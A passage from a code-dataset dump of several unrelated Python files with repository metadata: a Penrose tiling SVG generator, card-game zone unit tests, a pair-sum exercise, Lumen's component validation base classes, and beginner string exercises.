def path(self, opacity, fill_color):
side_l, side_r = self.v2 - self.v1, self.v3 - self.v2
# MOVE TO
d = "m {}, {} ".format(self.v1[0], self.v1[1])
# LINE TO
d += "l {}, {} ".format(side_l[0], side_l[1])
d += "l {}, {} ".format(side_r[0], side_r[1])
# LINE TO, CLOSE PATH
d += "l {}, {}z".format(-side_l[0], -side_l[1])
return '<path fill="{}" opacity="{}" d="{}"/>'.format(fill_color, opacity, d)
def dotted(self, stroke_width, stroke_color="black", tile_color="black", radius=0.1):
svg_circle = lambda point: '<circle cx="{}" cy="{}" r="{}" stroke="{}" stroke-width="{}" fill="{}" />\n'.format(point[0], point[1], radius, stroke_color, stroke_width, tile_color)
side_l, side_r = self.v2 - self.v1, self.v3 - self.v2
d = svg_circle(self.v1)
d += svg_circle(side_l)
d += svg_circle(side_r)
d += svg_circle(-side_l)
return d
@property
def center(self):
return (self.v1 + self.v3)/2
def mirror(self):
v1 = np.array([self.v1[0], -self.v1[1]])
v2 = np.array([self.v2[0], -self.v2[1]])
v3 = np.array([self.v3[0], -self.v3[1]])
return self.__class__(v1, v2, v3)
class Fatty(Triangle):
def split(self):
s1 = PSI_2 * self.v1 + PSI * self.v3
s2 = PSI_2 * self.v1 + PSI * self.v2
return (Fatty(s1, s2, self.v1),
Tiny(s2, s1, self.v2),
Fatty(self.v3, s1, self.v2))
class Tiny(Triangle):
def split(self):
s1 = PSI * self.v1 + PSI_2 * self.v2
return (Tiny(s1, self.v3, self.v1),
Fatty(self.v3, s1, self.v2))
class Tiling:
def __init__(self, initial=None, depth = 5, scale = 100, mirror=True):
"""Tiling manager class.
Args:
initial (list of `Triangle`, optional): The initial tiling. Defaults to None.
"""
if initial is None or initial == "rombus":
theta = 2 * math.pi / 5
rot = np.array([math.cos(theta), math.sin(theta)])
v1 = np.array([-scale / 2, 0])
v2 = scale / 2 * rot
v3 = np.array([scale / 2 / PSI, 0])
initial = [Fatty(v1, v2, v3)]
elif initial == "hexagon":
theta = math.pi / 5
alpha = math.cos(theta)
rot = np.array([math.cos(theta), math.sin(theta)])
v1 = np.array([scale, 0])
c = np.array([0, 0])
u1 = u2 = np.array([v1[0]*rot[0]-v1[1]*rot[1], v1[0]*rot[1]+v1[1]*rot[0]])
v2 = v3 = np.array([u1[0]*rot[0]-u1[1]*rot[1], u1[0]*rot[1]+u1[1]*rot[0]])
u3 = u4 = np.array([v3[0]*rot[0]-v3[1]*rot[1], v3[0]*rot[1]+v3[1]*rot[0]])
v4 = v5 = np.array([u4[0]*rot[0]-u4[1]*rot[1], u4[0]*rot[1]+u4[1]*rot[0]])
u5 = -v1
initial = [
Tiny(v1, c, u1),
Tiny(v2, c, u2),
Tiny(v3, c, u3),
Tiny(v4, c, u4),
Tiny(v5, c, u5)
]
self.tiling = initial
self.depth = depth
self.mirror = mirror
self.scale = scale
self._create(depth, mirror)
def _create(self, depth, mirror):
# Cut the tiles recursively
for _ in range(depth):
new_tiling = []
for tile in self.tiling:
new_tiling.extend(tile.split())
self.tiling = new_tiling
# Mirror the tiling along the x-Axis
if mirror:
self.tiling.extend([tile.mirror() for tile in self.tiling])
def to_svg(self, filepath, dotted=False, width=0.005, margin=1.05, fill_color="white", stroke_color="black", radius=.0005):
stroke_width = str(PSI ** self.depth * self.scale * width)
# Create viewport
xmin = ymin = - self.scale * margin
        width = height = 2 * self.scale * margin  # note: this reuses (overwrites) the `width` argument
viewbox ='{} {} {} {}'.format(xmin, ymin, width, height)
svg = ['<?xml version="1.0" encoding="utf-8"?>']
svg.append('<svg width="100%" height="100%" viewBox="{}"'.format(viewbox))
svg.append(' preserveAspectRatio="xMidYMid meet" version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">')
# Elements container
svg.append('<g style="stroke:{}; stroke-width: {};">'.format(stroke_color, stroke_width))
# Generates elements
if dotted:
for tile in self.tiling:
svg.append(tile.dotted(stroke_width, stroke_color, fill_color, .0005))
else:
for tile in self.tiling:
svg.append(tile.path(1, fill_color))
svg.append('</g>\n</svg>')
svg = '\n'.join(svg)
filepath = "{}_{}_{}".format(filepath, self.depth, width)
with open(filepath, 'w') as fo:
fo.write(svg)
if __name__ == "__main__":
t1 = Tiling(initial="hexagon", depth=8, scale=400)
t1.to_svg("output/rose", fill_color="pink", dotted=True, width=0.4)
# print_svg("penrose_2_3.svg", intial_tiling=t2, depth=2, base_width=.3)
# print_svg_dotted("penrose_dotted_9_3.svg", intial_tiling=t2, scale=scale, depth=9, base_width=.05)
|
RCoanda/rosey
|
base.py
|
base.py
|
py
| 5,459 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73928012028
|
import collections
import random
import unittest
import mock
from cardboard import card as c, events, zone as z
from cardboard.tests.util import GameTestCase
from cardboard.util import ANY
ENTER, LEAVE = events.ENTERED_ZONE, events.LEFT_ZONE
class ZoneTest(GameTestCase):
card = mock.Mock(spec=c.Card)
def setUp(self):
super(ZoneTest, self).setUp()
self.u = z.UnorderedZone(
name="Emerald Hill", game=self.game, contents=self.library,
)
self.o = z.OrderedZone(
name="Casino Night", game=self.game, contents=self.library,
)
class TestZones(ZoneTest):
def test_name(self):
self.assertEqual(self.u.name, "Emerald Hill")
self.assertEqual(self.o.name, "Casino Night")
def test_ordered(self):
self.assertFalse(self.u.ordered)
self.assertTrue(self.o.ordered)
def test_str_repr(self):
self.assertEqual(str(self.u), "Emerald Hill")
self.assertEqual(str(self.o), "Casino Night")
self.assertEqual(repr(self.u), "<Zone: Emerald Hill>")
self.assertEqual(repr(self.o), "<Zone: Casino Night>")
def test_contains(self):
for i in self.library:
self.assertIn(i, self.u)
self.assertIn(i, self.o)
self.assertNotIn(object(), self.u)
self.assertNotIn(object(), self.o)
def test_iter(self):
self.assertEqual(set(self.u), set(self.library))
self.assertEqual(list(self.o), self.library)
def test_len(self):
self.assertEqual(len(self.u), len(self.library))
self.assertEqual(len(self.o), len(self.library))
def test_add(self):
with self.assertTriggers(event=ENTER, card=30, zone=self.u):
self.u.add(30)
with self.assertTriggers(event=ENTER, card=30, zone=self.o):
self.o.add(30)
self.assertEqual(set(self.u), set(self.library) | {30})
self.assertEqual(list(self.o), self.library + [30])
def test_add_already_contains(self):
NO_OWNER, OWNER = "on the {}", "in {}'s {}"
u, o = self.u.name, self.o.name
n = mock.Mock()
self.u.add(n)
self.o.add(n)
self.resetEvents()
with self.assertRaisesRegexp(ValueError, NO_OWNER.format(u)):
self.u.add(n)
with self.assertRaisesRegexp(ValueError, NO_OWNER.format(o)):
self.o.add(n)
with self.assertRaisesRegexp(ValueError, OWNER.format(n.owner, u)):
self.u.owner = n.owner
self.u.add(n)
with self.assertRaisesRegexp(ValueError, OWNER.format(n.owner, o)):
self.o.owner = n.owner
self.o.add(n)
# wasn't added twice nor removed
self.assertIn(self.library[0], self.u)
self.assertEqual(self.o.count(self.library[0]), 1)
self.assertFalse(self.events.trigger.called)
def test_add_owner_redirection(self):
"""
Adding a card with a different owner than the zone's redirects.
"""
card = mock.Mock()
self.u.name, self.o.name = "foo", "bar"
self.u.owner, self.o.owner = mock.Mock(), mock.Mock()
self.u.add(card)
self.o.add(card)
card.owner.foo.add.assert_called_once_with(card)
card.owner.bar.add.assert_called_once_with(card)
def test_move(self):
self.o.add(self.card)
self.card.zone = self.o # on actual cards this is a property
with self.assertTriggers(event=ENTER, card=self.card, zone=self.u):
self.u.move(self.card)
self.card.zone = self.u
self.assertIn(self.card, self.u)
with self.assertTriggers(event=ENTER, card=self.card, zone=self.o):
self.o.move(self.card)
self.assertIn(self.card, self.o)
def test_move_to_self(self):
self.resetEvents()
# shouldn't even be checking library[0].zone
with self.assertRaises(ValueError):
self.u.move(self.library[0])
with self.assertRaises(ValueError):
self.o.move(self.library[0])
# wasn't added twice nor removed
self.assertIn(self.library[0], self.u)
self.assertEqual(self.o.count(self.library[0]), 1)
self.assertFalse(self.events.trigger.called)
def test_pop(self):
self.resetEvents()
e = self.u.pop()
self.assertLastEventsWere([dict(event=LEAVE, card=e, zone=self.u)])
self.resetEvents()
f = self.o.pop()
self.assertLastEventsWere([dict(event=LEAVE, card=f, zone=self.o)])
self.assertEqual(set(self.u), set(self.library) - {e})
self.assertEqual(list(self.o), self.library[:-1])
def test_remove(self):
e = self.library[-7]
self.library.remove(e)
with self.assertTriggers(event=LEAVE, card=e, zone=self.u):
self.u.remove(e)
with self.assertTriggers(event=LEAVE, card=e, zone=self.o):
self.o.remove(e)
self.assertEqual(set(self.u), set(self.library))
self.assertEqual(list(self.o), self.library)
self.assertRaises(ValueError, self.u.remove, object())
self.assertRaises(ValueError, self.o.remove, object())
def test_update(self):
self.u.update(range(4))
for i in range(4):
self.assertIn(i, self.u)
self.assertEqual(len(self.u), len(self.library) + 4)
evs = [dict(event=ENTER, card=i, zone=self.u) for i in range(4)]
self.assertLastEventsWere(evs)
self.resetEvents()
self.o.update(range(4))
self.assertEqual(self.o[-4:], range(4))
self.assertEqual(len(self.o), len(self.library) + 4)
evs = [dict(event=ENTER, card=i, zone=self.o) for i in range(4)]
self.assertLastEventsWere(evs)
def test_silent(self):
self.o.add(self.card)
self.card.zone = self.o
self.resetEvents()
self.u.add(20, silent=True)
self.o.add(20, silent=True)
self.u.remove(self.library[0], silent=True)
self.o.remove(self.library[0], silent=True)
self.u.pop(silent=True)
self.o.pop(silent=True)
self.u.move(self.card, silent=True)
self.card.zone = self.u
self.o.move(self.card, silent=True)
self.u.update(range(10), silent=True)
self.o.update(range(10), silent=True)
self.assertFalse(self.events.trigger.called)
def test_iterable(self):
i = range(10)
# TODO: This is incomplete, all the methods don't take iterables
o = z.OrderedZone(game=None, name="Emerald Hill", contents=i)
u = z.UnorderedZone(game=None, name="Emerald Hill", contents=i)
i.pop()
self.assertEqual(list(o), range(10))
self.assertEqual(list(u), range(10))
class TestOrderedZone(ZoneTest):
def test_reversed(self):
self.assertEqual(list(reversed(self.o)), list(reversed(self.library)))
def test_getitem(self):
for i, e in enumerate(self.library):
self.assertEqual(self.o[i], e)
self.assertEqual(self.o[2:7:2], self.library[2:7:2])
def test_set_del_item(self):
self.assertRaises(AttributeError, getattr, self.o, "__setitem__")
self.assertRaises(AttributeError, getattr, self.o, "__delitem__")
def test_count(self):
o = z.OrderedZone(game=None, name="Emerald Hill",
contents=[1, 1, 1, 2, 2, 3])
for i, e in enumerate(range(3, 0, -1), 1):
self.assertEqual(o.count(e), i)
def test_index(self):
e = self.library[4]
self.assertEqual(self.o.index(e), 4)
def test_pop_index(self):
e1 = self.o.pop(0)
e2 = self.o.pop(4)
self.library.pop(0)
self.library.pop(4)
self.assertEqual(list(self.o), self.library)
self.assertLastEventsWere([
{"event" : LEAVE, "card" : e1, "zone" : self.o},
{"event" : LEAVE, "card" : e2, "zone" : self.o},
])
def test_reverse(self):
self.o.reverse()
self.assertEqual(list(self.o), list(reversed(self.library)))
def test_shuffle(self):
with mock.patch("cardboard.zone.random.shuffle") as shuffle:
self.o.shuffle()
shuffle.assert_called_once_with(self.o._order)
class TestZone(unittest.TestCase):
def test_zone(self):
c = mock.Mock()
for zone in ["battlefield", "exile", "hand"]:
n = z.zone[zone](game=None, contents=[c])
self.assertIsInstance(n, z.UnorderedZone)
self.assertEquals(n.name, zone)
self.assertIn(c, n)
for zone in ["graveyard", "library", "stack"]:
n = z.zone[zone](game=None, contents=[c])
self.assertIsInstance(n, z.OrderedZone)
self.assertEquals(n.name, zone)
self.assertIn(c, n)
|
Julian/cardboard
|
cardboard/tests/test_zone.py
|
test_zone.py
|
py
| 8,874 |
python
|
en
|
code
| 7 |
github-code
|
6
|
36821141161
|
from math import ceil
import time
def add_up_version1(list_numbers, number):
half = ceil(number/2)
pairs = []
for item in range(half):
temp = []
temp.append(item)
temp.append(number - item)
pairs.append(temp)
for item in pairs:
if item[0] in list_numbers and item[1] in list_numbers:
return True
return False
def add_up_version2(list_numbers, number):
for item in range(len(list_numbers)):
temp_list = list_numbers.copy()
temp_number = temp_list.pop(item)
for num in temp_list:
if temp_number + num == number:
return True
return False
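# A third variant, added as a sketch for comparison (not part of the original exercise):
# one pass with a set of seen values gives O(n) membership checks instead of building pairs.
def add_up_version3(list_numbers, number):
    seen = set()
    for value in list_numbers:
        if number - value in seen:
            return True
        seen.add(value)
    return False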
def main():
start_time = time.time()
print(add_up_version1([10, 15, 3, 7], 17))
print(add_up_version1([1, 2, 3, 4], 3))
print(add_up_version1([1, 2, 3, 4], 4))
print(add_up_version1([1, 2, 3, 4], 10))
end_time = time.time()
print(end_time - start_time)
start_time = time.time()
print(add_up_version2([10, 15, 3, 7], 17))
print(add_up_version2([1, 2, 3, 4], 3))
print(add_up_version2([1, 2, 3, 4], 4))
print(add_up_version2([1, 2, 3, 4], 10))
end_time = time.time()
print(end_time - start_time)
if __name__ == "__main__":
main()
|
analetisouza/daily-problem
|
day1.py
|
day1.py
|
py
| 1,266 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32660332596
|
"""
Implements the baseclasses for all Component types in Lumen.
The base classes implement the core validation logic and the ability
to dynamically resolve Source and Variable references.
"""
from __future__ import annotations
import warnings
from functools import partial
from typing import (
Any, ClassVar, Dict, List, Tuple, Type,
)
import pandas as pd
import panel as pn
import param # type: ignore
from panel.io.cache import _container_hash, _hash_funcs
from panel.util import classproperty
from typing_extensions import Literal
from .state import state
from .util import (
VARIABLE_RE, cleanup_expr, is_ref, resolve_module_reference,
)
from .validation import (
ValidationError, match_suggestion_message, reverse_match_suggestion,
validate_parameters,
)
class Component(param.Parameterized):
"""
Baseclass for all Lumen component types including Source, Filter,
Transform, Variable and View types. Components must implement
serialization and deserialization into a specification dictionary
via the `from_spec` and `to_spec` protocol. Additonally they
should implement validation.
"""
__abstract = True
# Whether the component allows references
_allows_refs: ClassVar[bool] = True
# Parameters that are computed internally and are not part of the
# component specification
_internal_params: ClassVar[List[str]] = ['name']
# Deprecated parameters that are still allowed as spec keys
_legacy_params: ClassVar[List[str]] = []
    # Keys that must be declared as a list of strings or
# tuples of strings if one of multiple must be defined.
_required_keys: ClassVar[List[str | Tuple[str, ...]]] = []
# Keys that are valid to define
_valid_keys: ClassVar[List[str] | Literal['params'] | None] = None
# Whether to enforce parameter validation in specification
_validate_params: ClassVar[bool] = False
def __init__(self, **params):
self._refs = params.pop('refs', {})
expected = list(self.param)
validate_parameters(params, expected, type(self).name)
if self._allows_refs:
params = self._extract_refs(params, self._refs)
super().__init__(**params)
for p, ref in self._refs.items():
if isinstance(state.variables, dict):
continue
elif isinstance(ref, str) and '$variables' in ref:
ref_vars = VARIABLE_RE.findall(ref)
state.variables.param.watch(partial(self._update_ref, p, ref), ref_vars)
if '.' not in p and p not in params:
self._update_ref(p, ref)
def _extract_refs(self, params: Dict[str, Any], refs: Dict[str, Any]):
from .variables import Variable
processed = {}
for pname, pval in params.items():
if is_ref(pval):
refs[pname] = pval
elif isinstance(pval, (pn.widgets.Widget, param.Parameter, Variable)):
var = state.variables.add_variable(pval)
processed[pname] = var.value
refs[pname] = f'$variables.{var.name}'
continue
elif isinstance(pval, dict):
subrefs = {}
processed[pname] = self._extract_refs(pval, subrefs)
for subkey, subref in subrefs.items():
refs[f'{pname}.{subkey}'] = subref
continue
else:
processed[pname] = pval
return processed
def _update_ref(self, pname: str, ref: str, *events: param.parameterized.Event):
"""
Component should implement appropriate downstream events
following a change in a variable.
"""
expr = cleanup_expr(ref)
new_value = pd.eval(expr, local_dict=dict(state.variables), engine='python')
if '.' in pname:
pname, *keys = pname.split('.')
old = getattr(self, pname)
current = new = old.copy()
for k in keys[:-1]:
current = current[k]
current[keys[-1]] = new_value
else:
new = new_value
self.param.update({pname: new})
def _sync_refs(self, trigger: bool = True):
updates = []
for p, ref in self._refs.items():
if isinstance(state.variables, dict):
continue
elif isinstance(ref, str) and '$variables' in ref:
with param.discard_events(self):
self._update_ref(p, ref)
pname, *_ = p.split('.')
updates.append(pname)
if trigger:
self.param.trigger(*updates)
##################################################################
# Validation API
##################################################################
@classproperty
def _valid_keys_(cls) -> List[str] | None:
if cls._valid_keys == 'params':
valid = [p for p in cls.param if p not in cls._internal_params]
else:
valid = cls._valid_keys
return valid if valid is None else valid + cls._legacy_params
@classmethod
def _validate_keys_(cls, spec: Dict[str, Any]):
valid_keys = cls._valid_keys_
for key in spec:
if valid_keys is None or key in valid_keys:
continue
msg = f'{cls.__name__} component specification contained unknown key {key!r}.'
msg = match_suggestion_message(key, cls._valid_keys_ or [], msg)
raise ValidationError(msg, spec, key)
@classmethod
def _validate_required_(
cls, spec: Dict[str, Any], required: List[str | Tuple[str, ...]] | None = None
):
if required is None:
required_keys = cls._required_keys
else:
required_keys = required
for key in required_keys:
if isinstance(key, str):
if key in spec:
continue
msg = f'The {cls.__name__} component requires {key!r} parameter to be defined.'
msg, attr = reverse_match_suggestion(key, list(spec), msg)
raise ValidationError(msg, spec, attr)
elif isinstance(key, tuple):
if any(f in spec for f in key):
continue
skey = sorted(key)
key_str = "', '".join(skey[:-1]) + f"' or '{skey[-1]}"
msg = f"{cls.__name__} component requires one of '{key_str}' to be defined."
for f in key:
msg, attr = reverse_match_suggestion(f, list(spec), msg)
if attr:
break
raise ValidationError(msg, spec, attr)
@classmethod
def _validate_list_subtypes(
cls, key: str, subtype: Type[Component], subtype_specs: List[Dict[str, Any] | str],
spec: Dict[str, Any], context: Dict[str, Any], subcontext: List[Dict[str, Any] | str] | None = None
):
if not isinstance(subtype_specs, list):
raise ValidationError(
f'{cls.__name__} component {key!r} key expected list type but got {type(subtype_specs).__name__}. '
"This could be because of a missing dash in the yaml file.",
spec, key
)
subtypes = []
for subtype_spec in subtype_specs:
subtype_spec = subtype.validate(subtype_spec, context)
subtypes.append(subtype_spec)
if subcontext is not None:
subcontext.append(subtype_spec)
return subtypes
@classmethod
def _validate_dict_subtypes(
cls, key: str, subtype: Type[Component], subtype_specs: Dict[str, Dict[str, Any] | str],
spec: Dict[str, Any], context: Dict[str, Any], subcontext: Dict[str, Any] | None = None
):
if not isinstance(subtype_specs, dict):
raise ValidationError(
f'{cls.__name__} component {key!r} key expected dict type but got {type(subtype_specs).__name__}.',
spec, key
)
subtypes = {}
for subtype_name, subtype_spec in subtype_specs.items():
subtypes[subtype_name] = subtype.validate(subtype_spec, context)
if subcontext is not None:
subcontext[subtype_name] = subtypes[subtype_name]
return subtypes
@classmethod
def _validate_str_or_spec(
cls, key: str, subtype: Type[Component], subtype_spec: Dict[str, Any] | str,
spec: Dict[str, Any], context: Dict[str, Any]
):
if isinstance(subtype_spec, str):
if subtype_spec not in context[f'{key}s']:
msg = f'{cls.__name__} component specified non-existent {key} {subtype_spec!r}.'
msg = match_suggestion_message(subtype_spec, list(context[key]), msg)
raise ValidationError(msg, spec, subtype_spec)
return subtype_spec
return subtype.validate(subtype_spec, context)
@classmethod
def _validate_dict_or_list_subtypes(
cls, key: str, subtype: Type[Component], subtype_specs: Dict[str, Dict[str, Any] | str] | List[Dict[str, Any] | str],
spec: Dict[str, Any], context: Dict[str, Any], subcontext: Dict[str, Any] | List[Dict[str, Any] | str] | None = None
):
if isinstance(subtype_specs, list):
assert subcontext is None or isinstance(subcontext, list)
return cls._validate_list_subtypes(key, subtype, subtype_specs, spec, context, subcontext)
else:
assert subcontext is None or isinstance(subcontext, dict)
return cls._validate_dict_subtypes(key, subtype, subtype_specs, spec, context, subcontext)
@classmethod
def _deprecation(
cls, msg: str, key: str, spec: Dict[str, Any], update: Dict[str, Any]
):
warnings.warn(msg, DeprecationWarning)
if key not in spec:
spec[key] = {}
spec[key].update(update)
@classmethod
def _validate_ref(
cls, key: str, value: Any, spec: Dict[str, Any], context: Dict[str, Any]
):
refs = value[1:].split('.')
if refs[0] == 'variables':
if refs[1] not in context.get('variables', {}):
msg = f'{cls.__name__} component {key!r} references undeclared variable {value!r}.'
msg = match_suggestion_message(refs[1], list(context.get('variables', {})), msg)
raise ValidationError(msg, spec, refs[1])
elif refs[0] not in context.get('sources', {}):
msg = f'{cls.__name__} component {key!r} references undeclared source {value!r}.'
msg = match_suggestion_message(refs[1], list(context.get('sources', {})), msg)
raise ValidationError(msg, spec, refs[1])
@classmethod
def _validate_param(cls, key: str, value: Any, spec: Dict[str, Any]):
pobj = cls.param[key]
try:
if isinstance(pobj, param.Selector) and pobj.names and value in pobj.names:
return
pobj._validate(value)
except Exception as e:
msg = f"{cls.__name__} component {key!r} value failed validation: {str(e)}"
raise ValidationError(msg, spec, key)
@classmethod
def _is_component_key(cls, key: str) -> bool:
if key not in cls.param:
return False
pobj = cls.param[key]
return (
isinstance(pobj, param.ClassSelector) and
isinstance(pobj.class_, type) and
issubclass(pobj.class_, Component)
)
@classmethod
def _is_list_component_key(cls, key: str) -> bool:
if key not in cls.param:
return False
pobj = cls.param[key]
return (
isinstance(pobj, param.List) and
isinstance(pobj.item_type, type) and
issubclass(pobj.item_type, Component)
)
@classmethod
def _validate_spec_(
cls, spec: Dict[str, Any], context: Dict[str, Any] | None = None
) -> Dict[str, Any]:
validated: Dict[str, Any] = {}
if context is None:
context = validated
for key in (cls._valid_keys_ or list(spec)):
if key not in spec:
continue
val = spec[key]
if is_ref(val) and not cls._allows_refs:
raise ValidationError(
f'{cls.__name__} component does not allow references but {key} '
f'value ({val!r}) is a reference.', spec, val
)
if hasattr(cls, f'_validate_{key}'):
val = getattr(cls, f'_validate_{key}')(val, spec, context)
elif cls._is_component_key(key):
val = cls.param[key].class_.validate(val, context)
elif cls._is_list_component_key(key):
val = cls._validate_list_subtypes(
key, cls.param[key].item_type, val, spec, context
)
elif is_ref(val):
cls._validate_ref(key, val, spec, context)
elif key in cls.param:
if isinstance(val, str) and val.startswith('@'):
continue
cls._validate_param(key, val, spec)
validated[key] = val
return validated
##################################################################
# Public API
##################################################################
@property
def refs(self) -> List[str]:
return [v for k, v in self._refs.items() if v.startswith('$variables.')]
@classmethod
def from_spec(cls, spec: Dict[str, Any] | str) -> 'Component':
"""
Creates a Component instance from a specification.
Parameters
----------
spec : dict or str
Specification declared as a dictionary of parameter values
or a string referencing a source in the sources dictionary.
Returns
-------
Resolved and instantiated Component object
"""
if isinstance(spec, str):
raise ValueError(
"Component cannot be materialized by reference. Please pass "
"full specification for the component."
)
return cls(**spec)
def to_spec(self, context: Dict[str, Any] | None = None) -> Dict[str, Any]:
"""
Exports the full specification to reconstruct this component.
Parameters
----------
context: Dict[str, Any]
Context contains the specification of all previously serialized components,
e.g. to allow resolving of references.
Returns
-------
Declarative specification of this component.
"""
spec = {}
for p, value in self.param.values().items():
if p in self._internal_params or value == self.param[p].default:
continue
elif self._is_component_key(p):
pspec = value.to_spec(context=context)
if not pspec:
continue
value = pspec
elif self._is_list_component_key(p):
value = [
None if v is None else v.to_spec(context=context)
for v in value
]
spec[p] = value
if context is not None:
spec.update(self._refs)
return spec
@classmethod
def validate(
cls, spec: Dict[str, Any] | str, context: Dict[str, Any] | None = None
) -> Dict[str, Any] | str:
"""
Validates the component specification given the validation context.
Arguments
-----------
spec: dict | str
            The specification for the component being validated (or a reference to the component)
context: dict
Validation context contains the specification of all previously validated components,
e.g. to allow resolving of references.
Returns
--------
Validated specification.
"""
if isinstance(spec, str):
return spec
context = {} if context is None else context
cls._validate_keys_(spec)
cls._validate_required_(spec)
return cls._validate_spec_(spec, context)
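# Hypothetical round-trip sketch of the from_spec/to_spec/validate protocol above
# (assumption: `MyComponent` is a concrete Component subclass with a single `option`
# parameter whose default differs from 'custom'; it is not defined in this module):
#
#   spec = {'option': 'custom'}
#   comp = MyComponent.from_spec(MyComponent.validate(spec))
#   assert comp.to_spec() == spec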
class MultiTypeComponent(Component):
"""
    MultiTypeComponent is the baseclass for extensible Lumen components.
    A `MultiTypeComponent` can be resolved using the `_get_type` method
    by the name declared in the `<component>_type` attribute, where
    `<component>` is the lowercased name of the immediate MultiTypeComponent
    subclass. For example `class View(MultiTypeComponent)` should define
    `view_type` for all its descendants to override.
Just as any other Component, `MultiTypeComponent` implements
methods to construct an instance from a specification, export the
specification of a component and the ability to validate a
component.
"""
__abstract = True
_required_keys: ClassVar[List[str | Tuple[str, ...]]] = ['type']
@classproperty
def _valid_keys_(cls) -> List[str | Tuple[str, ...]] | None:
if cls._valid_keys is None:
valid = None
elif cls._valid_keys == 'params':
valid = list(cls.param)
elif 'params' in cls._valid_keys:
valid = cls._valid_keys.copy()
valid.extend(list(cls.param))
else:
valid = cls._valid_keys.copy()
if valid is not None and 'type' not in valid:
valid.append('type')
return valid if valid is None else valid + cls._legacy_params
@classproperty
def _base_type(cls):
if cls is MultiTypeComponent:
return
return cls.__mro__[cls.__mro__.index(MultiTypeComponent)-1]
@classproperty
def _component_type(cls) -> str:
component_type = getattr(cls, f'{cls._base_type.__name__.lower()}_type')
if component_type is not None:
return component_type
return f'{cls.__module__}.{cls.__name__}'
@classmethod
def _import_module(cls, component_type: str):
base_type = cls._base_type
try:
import_name = f'lumen.{base_type.__name__.lower()}s.{component_type}'
__import__(import_name)
except ImportError as e:
if e.name != import_name:
msg = (
f"In order to use the {base_type.__name__.lower()} "
f"component '{component_type}', the '{e.name}' package "
"must be installed."
)
raise ImportError(msg)
@classmethod
def _get_type(
cls, component_type: str, spec: Dict[str, Any] | None = None
) -> Type['MultiTypeComponent']:
base_type = cls._base_type
if component_type is None:
raise ValidationError(
f"No 'type' was provided during instantiation of {base_type.__name__} component.",
spec
)
if '.' in component_type:
return resolve_module_reference(component_type, base_type)
cls._import_module(component_type)
subcls_types = set()
for subcls in param.concrete_descendents(cls).values():
subcls_type = subcls._component_type
if subcls_type is None:
continue
subcls_types.add(subcls_type)
if subcls_type == component_type:
return subcls
msg = f"{base_type.__name__} component specification declared unknown type '{component_type}'."
msg = match_suggestion_message(component_type, list(subcls_types), msg)
raise ValidationError(msg, spec, component_type)
##################################################################
# Public API
##################################################################
@classmethod
def from_spec(cls, spec: Dict[str, Any] | str) -> 'MultiTypeComponent':
if isinstance(spec, str):
raise ValueError(
"MultiTypeComponent cannot be materialized by reference. Please pass "
"full specification for the MultiTypeComponent."
)
spec = dict(spec)
component_cls = cls._get_type(spec.pop('type'), spec)
return component_cls(**spec)
def to_spec(self, context: Dict[str, Any] | None = None) -> Dict[str, Any]:
"""
Exports the full specification to reconstruct this component.
Returns
-------
Resolved and instantiated Component object
"""
spec = super().to_spec(context=context)
spec['type'] = self._component_type
return spec
@classmethod
def validate(
cls, spec: Dict[str, Any] | str, context: Dict[str, Any] | None = None
) -> Dict[str, Any] | str:
"""
Validates the component specification given the validation context and the path.
Arguments
-----------
spec: dict | str
The specification for the component being validated or a reference to the component.
context: dict
Validation context contains the specification of all previously validated components,
e.g. to allow resolving of references.
Returns
--------
Validated specification.
"""
if isinstance(spec, str):
return spec
context = {} if context is None else context
if 'type' not in spec:
msg = f'{cls.__name__} component specification did not declare a type.'
msg, attr = reverse_match_suggestion('type', list(spec), msg)
raise ValidationError(msg, spec, attr)
component_cls = cls._get_type(spec['type'], spec)
component_cls._validate_keys_(spec)
component_cls._validate_required_(spec)
return component_cls._validate_spec_(spec, context)
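# Hypothetical sketch of the `<component>_type` resolution described in the docstring
# above (assumptions: `View` is an immediate MultiTypeComponent subclass as in the
# docstring example and 'table' names a registered view_type; purely illustrative):
#
#   spec = View.validate({'type': 'table'})
#   view_cls = View._get_type(spec['type'], spec)
#   view = View.from_spec(spec)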
_hash_funcs[Component] = lambda component: _container_hash(component.to_spec())
|
holoviz/lumen
|
lumen/base.py
|
base.py
|
py
| 22,041 |
python
|
en
|
code
| 149 |
github-code
|
6
|
72960115387
|
"""def reverse(a):
while a:
#for i in a:
if a != " ":
b = a[::-1]
print("Reversed string is: ", b)
if b == a:
print("Works")
else:
print("Bummer!")
return
reverse("roor")"""
"""prefixes = 'JKLMNOPQ'
suffix = 'ack'
#i = 0
for letter in prefixes:
if letter == 'O':
letter = letter + 'u'
print(letter + suffix)
elif letter == 'Q':
letter = letter + 'u'
print(letter + suffix)
else:
print(letter + suffix)
#i = i + 1
"""
"""a = "fruit"
print(a[:])"""
def find(word, letter, index):
#index = 0
while index < len(word):
if word[index] == letter:
return index
index = index + 1
return -1
print(find("aderinsola", "a", 0))
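# For comparison, the built-in str.find does the same lookup from a start index
# (a quick illustrative check, not part of the exercise):
#   "aderinsola".find("a", 0)   # -> 0, matching find("aderinsola", "a", 0) above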
"""def count(word, letter):
count = 0
a = []
b = 0
for a in word:
if letter == a[b]:
count = count + 1
print(count, end="")
count("abracadabra", "a")"""
"""def count(word, letter):
count = 0
a = []
b = 0
#c = b
for a in word:
if letter == a[b]:
count = count + 1
print(count, end="")
count("abracadabra", "a")"""
"""def count(word, letter):
count = 0
a = []
b = 0
#c = 0
#while c <= b:
#while word != " ":
# c = 0
for a in word:
if letter == a[b]:
count = count + 1
#c = c + 1
print(count, end="")
#c = c + 1
count("abracadabra", "a")"""
"""a = "rood"
b = []
while a:
c = 0
for i in a:
if a != " ":
b = a[::-1]
print(b, end="")
break
c = c + 1"""
#print(a)
#b = a[::-1]
#print(b)
"""if b == a:
print("Works!")
else:
print("Ouch! That sucks!")"""
"""def any_lowercase(s):
for c in s:
if c.islower():
#b = c
return True #if lowercase in the middle, this doesn't
else: #perform as it should
return False
def any_lowercase2(s):
for c in s:
if 'c'.islower():
return 'True'
else:
return 'False'
def any_lowercase3(s):
for c in s:
flag = c.islower()
return flag
def any_lowercase4(s):
flag = False
for c in s:
flag = flag or c.islower()
return flag
def any_lowercase5(s):
for c in s:
if not c.islower():
return False #This works well!
return True
#print(any_lowercase2("ADERINSOLA"))
def rotate_word(s, i):
holder = ""
for v in s:
c = ord(v)
if c >= ord('a') and c <= ord('z'):
if c > ord('m'):
c -= i
else:
c += i
elif c >= ord('A') and c <= ord('Z'):
if c > ord ('M'):
c -= i
else:
c += i
holder += chr(c)
return holder
